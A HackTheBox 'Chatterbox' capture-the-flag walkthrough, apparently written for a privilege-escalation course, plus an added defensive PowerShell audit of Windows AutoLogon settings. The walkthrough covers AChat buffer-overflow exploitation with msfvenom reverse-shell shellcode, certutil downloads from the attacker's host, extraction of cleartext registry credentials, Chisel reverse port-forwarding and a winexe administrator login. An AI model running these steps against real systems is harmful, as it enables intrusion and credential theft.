HTB:Chatterbox Walkthrough
Truth be told, the more Windows boxes you pwn, the less you will hate them.
Scan — NMAP
sudo nmap -sC -sV -Pn -O -p- -oN nmap-basic-tcp 10.10.10.74
Note: This scan took a while to complete. Go grab a coffee and some snacks while it runs 😉
Two open ports — 9255 and 9256. Both belong to the AChat service system.
I’m not familiar with this service so I went out to Google to look for vulnerabilities. We don’t have a version number either, so it was just wild guessing at this point.
Enum — AChat
Searchsploit had some results.
searchsploit achat
A remote buffer overflow that will give us RCE on the box!
Copy the exploit to current working directory. We then have to make some modifications to the script.
searchsploit -m 36025
Checking out the script, it is clear that we need to generate new shellcode customized to our requirements. Since msfvenom will give us the opcode values exactly as used in the script, we only have to remove the existing values and plug in the new ones.
Generate shellcode.
sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=<kali-ip-on-vpn> LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
It’s nice to see that the author of this exploit has already added the bad characters in the command :)
Copy and paste the buf values into the script, replacing the existing ones. Then change the server_address variable to point at Chatterbox.
server_address = ('10.10.10.74', 9256)
Foothold
Open a netcat listener on port 4444.
nc -nlvp 4444
Run the exploit.
python 36025.py
Capture the shell.
Grab the user flag!
Privilege Escalation
Some system enumeration before we jump into it.
C:\Windows\system32>systeminfo
Time to run some enumeration scripts 😏
Enumeration pt. 2
I love the PEASS-ng project and so will you! The single most useful enumeration tool I've used to date!
If you’re new to it, git clone the project and extract the winPEAS binary.
From the system information, we know that Chatterbox is a 32-bit Windows PC.
Open a python server in the same directory as the winPEASx86.exe binary.
If you’re having trouble finding it, just run locate winPEASx86.
python -m SimpleHTTPServer 9005
Download the tool onto Chatterbox. Make sure you have permission to write files in that directory first.
For example, the Alfred user will only have permission to write files in their home folder.
Then run the executable.
C:\Windows\system32>cd C:\Users\Alfred
C:\Users\Alfred\Desktop>certutil -urlcache -split -f http://<kali-ip-on-vpn>:9005/winPEASx86.exe winPEASx86.exe
C:\Users\Alfred\Desktop>winPEASx86.exe
After a while of perusing through the results, I noticed this:
AutoLogon credentials — nice! This means that the registry is storing cleartext credentials.
If you’re curious about what picked it up, check this command out:
C:\Users\Alfred\Desktop>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
For more such clean tricks, check out this priv-esc guide!
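As an added defender-side check that is not part of the original write-up, the PowerShell below audits the same Winlogon key winPEAS flagged: it reports whether AutoAdminLogon is turned on and whether a cleartext DefaultPassword value is stored there. It is read-only and only prints findings; the remediation it suggests is a note, not something it performs.

```powershell
# Added example, not from the original write-up: audit the Winlogon key for
# AutoLogon settings and a cleartext DefaultPassword (what winPEAS reported).
$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonFinding {
    if (-not (Test-Path $WinlogonKey)) { return $null }
    $props = Get-ItemProperty -Path $WinlogonKey

    # AutoAdminLogon is a REG_SZ holding "1" when enabled.
    $enabled      = ($props.AutoAdminLogon -eq '1')
    # A DefaultPassword value in this key is readable by any local user;
    # that is the cleartext finding the write-up exploits.
    $hasCleartext = -not [string]::IsNullOrEmpty($props.DefaultPassword)

    [pscustomobject]@{
        AutoAdminLogon       = $enabled
        DefaultUserName      = $props.DefaultUserName
        DefaultDomainName    = $props.DefaultDomainName
        CleartextPasswordSet = $hasCleartext
        Severity             = if ($hasCleartext) { 'High' }
                               elseif ($enabled)  { 'Medium' }
                               else               { 'Info' }
    }
}

$finding = Get-AutoLogonFinding
if ($null -eq $finding) {
    Write-Output 'Winlogon key not found.'
    return
}

$finding | Format-List

if ($finding.CleartextPasswordSet) {
    Write-Warning ("Cleartext DefaultPassword stored for '{0}'. " -f $finding.DefaultUserName)
    Write-Output 'Remediation: disable AutoAdminLogon, or configure it with Sysinternals Autologon, which keeps the password as an LSA secret instead of a readable registry value, then delete the DefaultPassword value.'
}
```

The password value itself is deliberately never printed, so the script can be run as part of a scheduled audit without copying the secret into logs.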
Now that we have a set of credentials (Alfred:Welcome1!) that will sign us in as Administrator, we need to find places we can use this.
This part of the winPEAS output shows that SMB is running, but only bound to the local interface, which is why NMAP didn't pick it up.
SMB can be used to escalate our current privileges.
But to connect to it, we need to use port-forwarding.
Port-forwarding is a technique that is used to map a local port to a remote service. We can employ this method to map port 445 on Kali to the SMB service running on Chatterbox. This way, when we engage with port 445 locally, the requests will be forwarded to Chatterbox.
If that confused you ….. well, at least I tried 😓
Port-forwarding using Chisel
Chisel is a very popular and easy-to-use port-forwarding tool.
Check out this guide by 0xdf for more clarity.
Get the 64-bit Linux version and the 32-bit windows version from the GitHub page.
On Kali, open a Chisel server and route via port 1337.
(sudo because port 445 is a privileged port and we want to listen on it locally)
sudo ./chisel_1.7.6_linux_amd64 server -p 1337 --reverse
Now on Chatterbox, download the 32-bit chisel and run it. (You need to open a python server in the directory where you downloaded Chisel to serve it, just like we did with winPEASx86.exe.)
certutil -urlcache -split -f http://<kali-ip-on-vpn>:9005/chisel_1.7.6_windows_386 chisel.exe
chisel.exe client <kali-ip-on-vpn>:1337 R:445:127.0.0.1:445
Check if the port is listening on Kali:
netstat -ano | grep 445
Use winexe to run commands on the target via SMB, logging in as the Administrator.
Winexe is one of the many tools we can use to run commands remotely on Windows systems.
Install: sudo apt-get install winexe
winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
Remember that we can access port 445 on Chatterbox as if it were a local service because of port-forwarding. Hence the target address of 127.0.0.1.
And that’s as good as it gets, folks!
Rooted 😁
Grab the root flag!
References
- Since this write-up was done as part of TCM’s Windows PrivEsc course, credits to Heath Adams ❤
- https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
- All in-line links mentioned in the write-up.